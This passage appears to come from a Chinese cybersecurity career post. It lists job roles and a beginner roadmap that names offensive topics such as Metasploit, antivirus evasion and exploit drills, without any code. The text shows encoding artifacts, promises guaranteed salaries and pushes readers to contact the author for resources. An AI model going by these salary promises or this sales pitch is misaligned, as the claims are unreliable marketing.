全運(yùn)營(yíng)工程師崗位釋義在運(yùn)維的基礎(chǔ)上高效可持續(xù)地不斷提升企業(yè)的安全防御能力。崗位職責(zé)負(fù)責(zé)監(jiān)控、掃描等各類(lèi)安全策略的制定和優(yōu)化負(fù)責(zé)信息安全事件的應(yīng)急響應(yīng)參與網(wǎng)絡(luò)安全評(píng)估工作、安全加固工作和監(jiān)控等等工作難度3顆星薪資現(xiàn)狀04崗位四安全開(kāi)發(fā)工程師崗位釋義顧名思義對(duì)安全產(chǎn)品及平臺(tái)、策略等進(jìn)行開(kāi)發(fā)工作。崗位職責(zé)負(fù)責(zé)網(wǎng)絡(luò)安全產(chǎn)品的系統(tǒng)技術(shù)設(shè)計(jì)、代碼開(kāi)發(fā)與實(shí)現(xiàn)、單元測(cè)試、靜態(tài)檢查、本地構(gòu)建等工作參與公司其他產(chǎn)品的系統(tǒng)技術(shù)設(shè)計(jì)以及研發(fā)工作。工作難度5顆星薪資現(xiàn)狀05崗位五等保測(cè)評(píng)工程師崗位釋義等保測(cè)評(píng)也叫等級(jí)保護(hù)測(cè)評(píng)主要負(fù)責(zé)開(kāi)展信息安全等級(jí)保護(hù)測(cè)評(píng)、信息安全風(fēng)險(xiǎn)評(píng)估、應(yīng)急響應(yīng)、信息安全咨詢(xún)等工作 。崗位職責(zé)網(wǎng)絡(luò)安全等級(jí)保護(hù)測(cè)評(píng)項(xiàng)目實(shí)施Web滲透測(cè)試、操作系統(tǒng)安全加固等安全項(xiàng)目實(shí)施配合工作難度3顆星薪資現(xiàn)狀06崗位六安全研究工程師崗位釋義網(wǎng)絡(luò)安全領(lǐng)域的研究人才。崗位職責(zé)跟蹤和分析國(guó)內(nèi)外安全事件、發(fā)展趨勢(shì)和解決方案承擔(dān)或參與創(chuàng)新型課題研究參與項(xiàng)目方案設(shè)計(jì)組織推動(dòng)項(xiàng)目落實(shí)完成研究?jī)?nèi)容、負(fù)責(zé)網(wǎng)絡(luò)安全關(guān)鍵技術(shù)攻關(guān)和安全工具研發(fā)工作難度5顆星薪資現(xiàn)狀07崗位七漏洞挖掘工程師崗位釋義主要從事逆向、軟件分析、漏洞挖掘工作崗位職責(zé)通過(guò)模擬實(shí)施特定方法所獲得的結(jié)果評(píng)估計(jì)算機(jī)網(wǎng)絡(luò)系統(tǒng)安全狀況通過(guò)特定技術(shù)的實(shí)施尋找網(wǎng)絡(luò)安全漏洞發(fā)現(xiàn)但不利用漏洞。工作難度5顆星薪資現(xiàn)狀08崗位八安全管理工程師崗位釋義負(fù)責(zé)信息安全相關(guān)流程、規(guī)范、標(biāo)準(zhǔn)的制定和評(píng)審負(fù)責(zé)公司整體安全體系建設(shè)。崗位職責(zé)全業(yè)務(wù)系統(tǒng)網(wǎng)絡(luò)安全技術(shù)體系的規(guī)劃和建設(shè)優(yōu)化網(wǎng)絡(luò)安全架構(gòu)負(fù)責(zé)網(wǎng)絡(luò)安全相關(guān)流程、規(guī)范、標(biāo)準(zhǔn)的指定和評(píng)審高效處置突發(fā)事件負(fù)責(zé)網(wǎng)絡(luò)安全防護(hù)系統(tǒng)的建設(shè)提升網(wǎng)絡(luò)安全保障水平工作難度4顆星09崗位九應(yīng)急響應(yīng)工程師崗位釋義主要負(fù)責(zé)信息安全事件應(yīng)急響應(yīng)、攻擊溯源、取證分析工作參與應(yīng)急響應(yīng)、攻擊溯源、取證分析技術(shù)的研究提升整體重大信息安全事件應(yīng)急處置能力。崗位職責(zé)負(fù)責(zé)信息安全事件應(yīng)急響應(yīng)、攻擊溯源、取證分析工作對(duì)安全事件的應(yīng)急處置進(jìn)行經(jīng)驗(yàn)總結(jié)開(kāi)展應(yīng)急響應(yīng)培訓(xùn)負(fù)責(zé)各業(yè)務(wù)系統(tǒng)的上線前安全測(cè)試黑盒白盒及滲透測(cè)試工作參與應(yīng)急響應(yīng)、攻擊溯源、取證分析技術(shù)的研究提升整體重大信息安全事件應(yīng)急處置能力。跟蹤國(guó)內(nèi)外安全熱點(diǎn)事件、主流安全漏洞、威脅情報(bào)、黑灰產(chǎn)動(dòng)態(tài)并進(jìn)行分析研究形成應(yīng)對(duì)方案工作難度4顆星薪酬現(xiàn)狀10崗位十?dāng)?shù)據(jù)安全工程師崗位釋義主要對(duì)公司的數(shù)據(jù)安全的日常維護(hù)和管理工作確保公司數(shù)據(jù)安全。崗位職責(zé)負(fù)責(zé)數(shù)據(jù)安全日常維護(hù)和管理工作包括數(shù)據(jù)安全審核、數(shù)據(jù)安全事件的監(jiān)控與響應(yīng)、安全合規(guī)的審計(jì)與調(diào)查等負(fù)責(zé)數(shù)據(jù)安全標(biāo)準(zhǔn)規(guī)范的制定和管理包括數(shù)據(jù)安全需求識(shí)別、風(fēng)險(xiǎn)分析、數(shù)據(jù)分級(jí)分類(lèi)、數(shù)據(jù)脫敏、數(shù)據(jù)流轉(zhuǎn)、泄露防護(hù)、權(quán)限管控等推進(jìn)相關(guān)安全管控策略在平臺(tái)落地、執(zhí)行。負(fù)責(zé)開(kāi)展與數(shù)據(jù)全生命周期管理有關(guān)的各項(xiàng)數(shù)據(jù)安全工作;負(fù)責(zé)跨平臺(tái)、跨地域數(shù)據(jù)傳輸、交互等數(shù)據(jù)安全方案制定與落地定期組織開(kāi)展數(shù)據(jù)安全自評(píng)工作發(fā)現(xiàn)潛在數(shù)據(jù)安全風(fēng)險(xiǎn)制定相應(yīng)的管控措施并推進(jìn)落實(shí)整改。工作難度4顆星薪酬現(xiàn)狀網(wǎng)絡(luò)安全學(xué)習(xí)路線學(xué)習(xí)資源網(wǎng)絡(luò)安全的知識(shí)多而雜怎么科學(xué)合理安排下面給大家總結(jié)了一套適用于網(wǎng)安零基礎(chǔ)的學(xué)習(xí)路線應(yīng)屆生和轉(zhuǎn)行人員都適用學(xué)完保底6k就算你底子差如果能趁著網(wǎng)安良好的發(fā)展勢(shì)頭不斷學(xué)習(xí)日后跳槽大廠、拿到百萬(wàn)年薪也不是不可能初級(jí)網(wǎng)工1、網(wǎng)絡(luò)安全理論知識(shí)2天①了解行業(yè)相關(guān)背景前景確定發(fā)展方向。②學(xué)習(xí)網(wǎng)絡(luò)安全相關(guān)法律法規(guī)。③網(wǎng)絡(luò)安全運(yùn)營(yíng)的概念。④等保簡(jiǎn)介、等保規(guī)定、流程和規(guī)范。非常重要2、滲透測(cè)試基礎(chǔ)一周①滲透測(cè)試的流程、分類(lèi)、標(biāo)準(zhǔn)②信息收集技術(shù)主動(dòng)/被動(dòng)信息搜集、Nmap工具、Google Hacking③漏洞掃描、漏洞利用、原理利用方法、工具M(jìn)SF、繞過(guò)IDS和反病毒偵察④主機(jī)攻防演練MS17-010、MS08-067、MS10-046、MS12-20等3、操作系統(tǒng)基礎(chǔ)一周①Windows系統(tǒng)常見(jiàn)功能和命令②Kali Linux系統(tǒng)常見(jiàn)功能和命令③操作系統(tǒng)安全系統(tǒng)入侵排查/系統(tǒng)加固基礎(chǔ)4、計(jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)一周①計(jì)算機(jī)網(wǎng)絡(luò)基礎(chǔ)、協(xié)議和架構(gòu)②網(wǎng)絡(luò)通信原理、OSI模型、數(shù)據(jù)轉(zhuǎn)發(fā)流程③常見(jiàn)協(xié)議解析HTTP、TCP/IP、ARP等④網(wǎng)絡(luò)攻擊技術(shù)與網(wǎng)絡(luò)安全防御技術(shù)⑤Web漏洞原理與防御主動(dòng)/被動(dòng)攻擊、DDOS攻擊、CVE漏洞復(fù)現(xiàn)5、數(shù)據(jù)庫(kù)基礎(chǔ)操作2天①數(shù)據(jù)庫(kù)基礎(chǔ)②SQL語(yǔ)言基礎(chǔ)③數(shù)據(jù)庫(kù)安全加固6、Web滲透1周①HTML、CSS和JavaScript簡(jiǎn)介②OWASP Top10③Web漏洞掃描工具④Web滲透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏掃等恭喜你如果學(xué)到這里你基本可以從事一份網(wǎng)絡(luò)安全相關(guān)的工作比如滲透測(cè)試、Web 滲透、安全服務(wù)、安全分析等崗位如果等保模塊學(xué)的好還可以從事等保工程師。薪資區(qū)間6k-15k到此為止大概1個(gè)月的時(shí)間。你已經(jīng)成為了一名“腳本小子”。那么你還想往下探索嗎【“腳本小子”成長(zhǎng)進(jìn)階資源領(lǐng)取】7、腳本編程初級(jí)/中級(jí)/高級(jí)在網(wǎng)絡(luò)安全領(lǐng)域。是否具備編程能力是“腳本小子”和真正黑客的本質(zhì)區(qū)別。在實(shí)際的滲透測(cè)試過(guò)程中面對(duì)復(fù)雜多變的網(wǎng)絡(luò)環(huán)境當(dāng)常用工具不能滿(mǎn)足實(shí)際需求的時(shí)候往往需要對(duì)現(xiàn)有工具進(jìn)行擴(kuò)展或者編寫(xiě)符合我們要求的工具、自動(dòng)化腳本這個(gè)時(shí)候就需要具備一定的編程能力。在分秒必爭(zhēng)的CTF競(jìng)賽中想要高效地使用自制的腳本工具來(lái)實(shí)現(xiàn)各種目的更是需要擁有編程能力.零基礎(chǔ)入門(mén)建議選擇腳本語(yǔ)言Python/PHP/Go/Java中的一種對(duì)常用庫(kù)進(jìn)行編程學(xué)習(xí) 搭建開(kāi)發(fā)環(huán)境和選擇IDE,PHP環(huán)境推薦Wamp和XAMPP IDE強(qiáng)烈推薦Sublime ·Python編程學(xué)習(xí)學(xué)習(xí)內(nèi)容包含語(yǔ)法、正則、文件、 網(wǎng)絡(luò)、多線程等常用庫(kù)推薦《Python核心編程》不要看完 ·用Python編寫(xiě)漏洞的exp,然后寫(xiě)一個(gè)簡(jiǎn)單的網(wǎng)絡(luò)爬蟲(chóng) ·PHP基本語(yǔ)法學(xué)習(xí)并書(shū)寫(xiě)一個(gè)簡(jiǎn)單的博客系統(tǒng) 熟悉MVC架構(gòu)并試著學(xué)習(xí)一個(gè)PHP框架或者Python框架 (可選) ·了解Bootstrap的布局或者CSS。8、超級(jí)網(wǎng)工這部分內(nèi)容對(duì)零基礎(chǔ)的同學(xué)來(lái)說(shuō)還比較遙遠(yuǎn)就不展開(kāi)細(xì)說(shuō)了貼一個(gè)大概的路線。感興趣的童鞋可以研究一下不懂得地方可以【點(diǎn)這里】加我耗油跟我學(xué)習(xí)交流一下。網(wǎng)絡(luò)安全工程師企業(yè)級(jí)學(xué)習(xí)路線如圖片過(guò)大被平臺(tái)壓縮導(dǎo)致看不清的話(huà)可以【點(diǎn)這里】加我耗油發(fā)給你大家也可以一起學(xué)習(xí)交流一下。一些我自己買(mǎi)的、其他平臺(tái)白嫖不到的視頻教程需要的話(huà)可以?huà)呙柘路娇ㄆ游液挠桶l(fā)給你都是無(wú)償分享的大家也可以一起學(xué)習(xí)交流一下。網(wǎng)絡(luò)安全學(xué)習(xí)路線學(xué)習(xí)資源結(jié)語(yǔ)網(wǎng)絡(luò)安全產(chǎn)業(yè)就像一個(gè)江湖各色人等聚集。相對(duì)于歐美國(guó)家基礎(chǔ)扎實(shí)懂加密、會(huì)防護(hù)、能挖洞、擅工程的眾多名門(mén)正派我國(guó)的人才更多的屬于旁門(mén)左道很多白帽子可能會(huì)不服氣因此在未來(lái)的人才培養(yǎng)和建設(shè)上需要調(diào)整結(jié)構(gòu)鼓勵(lì)更多的人去做“正向”的、結(jié)合“業(yè)務(wù)”與“數(shù)據(jù)”、“自動(dòng)化”的“體系、建設(shè)”才能解人才之渴真正的為社會(huì)全面互聯(lián)網(wǎng)化提供安全保障。特別聲明此教程為純技術(shù)分享本書(shū)的目的決不是為那些懷有不良動(dòng)機(jī)的人提供及技術(shù)支持也不承擔(dān)因?yàn)榧夹g(shù)被濫用所產(chǎn)生的連帶責(zé)任本書(shū)的目的在于最大限度地喚醒大家對(duì)網(wǎng)絡(luò)安全的重視并采取相應(yīng)的安全措施從而減少由網(wǎng)絡(luò)安全而帶來(lái)的經(jīng)濟(jì)損失